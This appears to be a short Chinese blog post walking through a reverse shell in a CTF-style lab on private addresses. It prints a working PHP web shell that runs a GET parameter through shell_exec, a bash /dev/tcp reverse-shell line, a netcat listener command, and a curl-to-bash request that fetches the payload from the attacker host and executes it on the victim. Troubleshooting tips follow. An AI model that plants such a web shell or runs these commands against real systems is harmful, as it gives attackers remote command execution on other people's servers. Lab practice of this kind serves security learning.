反弹shell

本文详细介绍了如何在CTF竞赛中实现从受害者主机到攻击者主机的反弹Shell过程。通过在受害者网站部署shell.php文件和在攻击者网站放置con.txt文件,结合curl命令和bash执行,最终成功获取远程Shell。文章强调了端口监听和文件位置的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

嫌疑人:192.168.249.147
受害者:192.168.249.130

这次的主要目的是模拟CTF题目中反弹shell。


首先,我们在受害机网站准备一个shell.php文件,内容如下:<?phpshell_exec($_GET['a'])?>,用以命令执行。
再在嫌疑人网站根目录准备一个con.txt文件,内容如下:bash -i >& /dev/tcp/192.168.249.147/2333 0>&1

再利用嫌疑人的shell执行nc -lvp 2333(监听端口)

当我们访问受害者网站的shell.php,并传入?a=curl 192.168.249.147/con.txt |bash
此时,嫌疑人成功反弹了受害者的shell,效果如图:
在这里插入图片描述

这里有几点需要注意:

  1. 检查端口是否打开,当攻击机的反弹shell所用端口关闭时是无法成功反弹的
  2. 一定要先监听,如果不先监听,则会出现bash: connect: Connection refused的字样,则反弹失败。
  3. 攻击的txt文件一定要放在网站目录,其他目录不行,在这里我们用curl命令进行了攻击,实质是利用curl命令读取网站文件然后再利用bash命令执行,所以curl处的是txt所在的目录。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值